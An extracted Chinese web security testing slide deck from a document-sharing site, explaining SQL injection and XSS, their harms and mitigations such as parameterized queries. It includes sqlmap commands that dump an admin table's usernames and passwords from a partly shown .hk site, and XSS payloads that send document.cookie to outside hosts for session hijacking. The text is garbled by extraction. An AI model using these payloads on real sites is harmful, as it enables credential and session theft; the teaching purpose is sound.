版權(quán)說(shuō)明:本文檔由用戶(hù)提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)
文檔簡(jiǎn)介
Web安全性測(cè)試安全性測(cè)試手段SQL注入漏洞(工具:SqlMap)XSS跨站攻擊漏洞CSRF跨站請(qǐng)求偽造DDOS分布式拒絕服務(wù)釣魚(yú)點(diǎn)擊劫持跨站腳本漏洞,SQL注入原理跨站腳本漏洞分類(lèi)跨站腳本漏洞及案列漏洞解決方案漏洞的危害SQL注入漏洞
數(shù)據(jù)庫(kù)信息泄漏:數(shù)據(jù)庫(kù)中存儲(chǔ)的用戶(hù)隱私信息泄露。
網(wǎng)頁(yè)篡改:通過(guò)操作數(shù)據(jù)庫(kù)對(duì)特定網(wǎng)頁(yè)進(jìn)行篡改。網(wǎng)站被掛馬,傳播惡意軟件:修改數(shù)據(jù)庫(kù)一些字段的值,嵌入網(wǎng)馬鏈接,進(jìn)行掛馬攻擊。數(shù)據(jù)庫(kù)被惡意操作:數(shù)據(jù)庫(kù)服務(wù)器被攻擊,數(shù)據(jù)庫(kù)的系統(tǒng)管理員帳戶(hù)被竄改。服務(wù)器被遠(yuǎn)程控制,被安裝后門(mén):經(jīng)由數(shù)據(jù)庫(kù)服務(wù)器提供的操作系統(tǒng)支持,讓黑客得以修改或控制操作系統(tǒng)。
XSS跨站腳本漏洞
釣魚(yú)欺騙:最典型的就是利用目標(biāo)網(wǎng)站的反射型跨站腳本漏洞將目標(biāo)網(wǎng)站重定向到釣魚(yú)網(wǎng)站,或者注入釣魚(yú)JavaScript以監(jiān)控目標(biāo)網(wǎng)站的表單輸入,甚至發(fā)起基于DHTML更高級(jí)的釣魚(yú)攻擊方式。網(wǎng)站掛馬:跨站后利用IFrame嵌入隱藏的惡意網(wǎng)站或者將被攻擊者定向到惡意網(wǎng)站上,或者彈出惡意網(wǎng)站窗口等方式都可以進(jìn)行掛馬攻擊。身份盜用:Cookie是用戶(hù)對(duì)于特定網(wǎng)站的身份驗(yàn)證標(biāo)志,XSS可以盜取用戶(hù)的Cookie,從而利用該Cookie獲取用戶(hù)對(duì)該網(wǎng)站的操作權(quán)限。如果一個(gè)網(wǎng)站管理員用戶(hù)Cookie被竊取,將會(huì)對(duì)網(wǎng)站引發(fā)巨大的危害。盜取網(wǎng)站用戶(hù)信息:當(dāng)能夠竊取到用戶(hù)Cookie從而獲取到用戶(hù)身份時(shí),攻擊者可以獲取到用戶(hù)對(duì)網(wǎng)站的操作權(quán)限,從而查看用戶(hù)隱私信息。XSS蠕蟲(chóng):XSS
蠕蟲(chóng)可以用來(lái)打廣告、刷流量、掛馬、惡作劇、破壞網(wǎng)上數(shù)據(jù)、實(shí)施DDoS攻擊等。SqlMap實(shí)例Sqlmap.py–u.hk/article.php?id=276–dbms“Mysql”--tables–D“wepost”/*指定數(shù)據(jù)庫(kù)Sqlmap.py–u.hk/article.php?id=276–dbms“Mysql”–current-user/*獲取當(dāng)前用戶(hù)名稱(chēng)Currentuser:‘root@localhost’Sqlmap.py–u.hk/article.php?id=276–dbms“Mysql”–current-db/*獲取數(shù)據(jù)庫(kù)Currentdatabase:‘wepost’Sqlmap.py–u.hk/article.php?id=276–dbms“Mysql”–columns–T“admin”–D“wepost”Sqlmap.py–.hk/article.php?id=276–dbms“Mysql”–dump–c“userid,password”–T“admin”–D“wepost”–v1SQL注入漏洞解決方案輸入驗(yàn)證錯(cuò)誤消息處理加密處理存儲(chǔ)過(guò)程來(lái)執(zhí)行所有的查詢(xún)使用專(zhuān)業(yè)的漏洞掃描工具禁止對(duì)重要表的Drop、Insert、Update、DeleteSQL注入漏洞解決方案對(duì)所有來(lái)自用戶(hù)輸入的數(shù)據(jù)進(jìn)行嚴(yán)格檢查、對(duì)數(shù)據(jù)庫(kù)配置實(shí)用最小權(quán)限原則所有查詢(xún)語(yǔ)句都實(shí)用庫(kù)提供的參數(shù)化查詢(xún)接口,參數(shù)化的語(yǔ)句實(shí)用參數(shù)而不是將用戶(hù)輸入變量嵌入到SQL語(yǔ)句中對(duì)進(jìn)入數(shù)據(jù)庫(kù)的特殊字符(“”<>&--;等)進(jìn)行轉(zhuǎn)義處理或編碼轉(zhuǎn)換數(shù)據(jù)長(zhǎng)度嚴(yán)格規(guī)定,能防止比較長(zhǎng)的SQL注入語(yǔ)句無(wú)法正確執(zhí)行數(shù)據(jù)層編碼統(tǒng)一避免顯示SQL錯(cuò)誤信息,如類(lèi)型、字段什么是XSSCrosssitescripting簡(jiǎn)稱(chēng)XSS原理:利用網(wǎng)站的漏洞向網(wǎng)站的頁(yè)面注入JAVASCRIPT等腳本內(nèi)容。根源:程序的輸入、輸出沒(méi)有考慮安全因素XSSCheatSheet/xss.html了解不痛瀏覽器和各種特殊的HTML標(biāo)簽如何執(zhí)行腳本XSS需要使用的關(guān)鍵字
“:!--<XSS>=&{()}各類(lèi)偽協(xié)議頭:
Javascript:vbscript:CSS樣式表腳本注入 Style=xss:expression(eval(String.fromCharCode(105,102,40,119,105,110,100,111,119,46,120,33,61,34,49,34,41,123,97,108,101,114,116,40,34,120,115,115,34,41,59,119,105,110,100,111,119,46,120,61,34,49,34,59,1235)))盜取用戶(hù)cookie信息嵌入惡意代碼<XMLID=I>
<X> <C><![CDATA[<imgsrc="javas]]><![CDATA[cript:xx=newImage();xx.src='39/pic/163.asp?url='+escape(document.URL)+'&cookie='+escape(document.cookie);"width=0height=0>]]>
</C>
</X></xml><SPANDATASRC=#IDATAFLD=CDATAFORMATAS=HTML></SPAN>掛馬
插入惡意的腳本內(nèi)容,運(yùn)行病毒、木馬。釣魚(yú)
篡改網(wǎng)頁(yè)內(nèi)容,騙取賬號(hào)、密碼等詐騙行為。劫持會(huì)話(huà)
讀取會(huì)話(huà)Cookie,傳送給第三方劫持身份。XSSWorm
使用AJAX技術(shù),做幾何趨勢(shì)的增長(zhǎng)傳播。非持久型XSS
需要從URL傳參,點(diǎn)擊鏈接觸發(fā)持久型XSS XSS內(nèi)容已存儲(chǔ)到數(shù)據(jù)庫(kù),寫(xiě)到固定頁(yè)面。DOMXSS JAVASCRIPT處理數(shù)據(jù)輸出出現(xiàn)漏洞
瀏覽器的漏洞造成的XSS
表單值容易出現(xiàn)XSS
搜索框、信息提示、個(gè)人資料、友情鏈接、北京圖片等。
各類(lèi)表單值、隱藏的表單值都很危險(xiǎn)在搜索框中輸入“><bodyonload=alert(document.cookie)><“點(diǎn)擊搜索課程上圖可看到已過(guò)濾反斜杠非持久XSS持久XSS分享網(wǎng)站地址”/a.jsp?name=<script>alert(document.cookie)</script>”攻擊代碼
varimg=newImage();img.src=http://www.XXX.cn/log.jsp?c=“”+document.cookie”””看似前段驗(yàn)證了非法字符,就已經(jīng)安全了嗎?錯(cuò)仍然可以通過(guò)GET方法跳過(guò)前段/groups/search?keyword=%22%3E3Cbody%20onload=alert(1)%3E%3C%22記錄會(huì)話(huà)模擬登陸劫持會(huì)話(huà)發(fā)送XSS給好友
溫馨提示
- 1. 本站所有資源如無(wú)特殊說(shuō)明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請(qǐng)下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請(qǐng)聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶(hù)所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁(yè)內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒(méi)有圖紙預(yù)覽就沒(méi)有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫(kù)網(wǎng)僅提供信息存儲(chǔ)空間,僅對(duì)用戶(hù)上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對(duì)用戶(hù)上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
- 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請(qǐng)與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶(hù)因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。
最新文檔
- 二零二五版股票質(zhì)押擔(dān)保合同范本編制指南與應(yīng)用3篇
- 二零二五版建筑施工進(jìn)度款支付合同3篇
- 2025年度個(gè)人倉(cāng)儲(chǔ)租賃合同范本大全4篇
- 2025年度大型活動(dòng)臨時(shí)演員選拔與管理合同4篇
- 2025年度建筑用鋼材及制品供應(yīng)合同3篇
- 2025年度出租車(chē)公司與網(wǎng)約車(chē)平臺(tái)聯(lián)合運(yùn)營(yíng)合同范本4篇
- 2025年度生物質(zhì)能發(fā)電變配電系統(tǒng)施工合同范本3篇
- 二零二五年礦山企業(yè)礦山地質(zhì)環(huán)境監(jiān)測(cè)與評(píng)價(jià)合同集3篇
- 二零二五版農(nóng)業(yè)智能技術(shù)研發(fā)與應(yīng)用合同2篇
- 2025版房地產(chǎn)項(xiàng)目融資合同參考4篇
- 2025年度土地經(jīng)營(yíng)權(quán)流轉(zhuǎn)合同補(bǔ)充條款范本
- 南通市2025屆高三第一次調(diào)研測(cè)試(一模)地理試卷(含答案 )
- 2025年上海市閔行區(qū)中考數(shù)學(xué)一模試卷
- 2025中國(guó)人民保險(xiǎn)集團(tuán)校園招聘高頻重點(diǎn)提升(共500題)附帶答案詳解
- 0的認(rèn)識(shí)和加、減法(說(shuō)課稿)-2024-2025學(xué)年一年級(jí)上冊(cè)數(shù)學(xué)人教版(2024)001
- 重癥患者家屬溝通管理制度
- 醫(yī)院安全生產(chǎn)治本攻堅(jiān)三年行動(dòng)實(shí)施方案
- 法規(guī)解讀丨2024新版《突發(fā)事件應(yīng)對(duì)法》及其應(yīng)用案例
- 工程項(xiàng)目合作備忘錄范本
- 信息安全意識(shí)培訓(xùn)課件
- Python試題庫(kù)(附參考答案)
評(píng)論
0/150
提交評(píng)論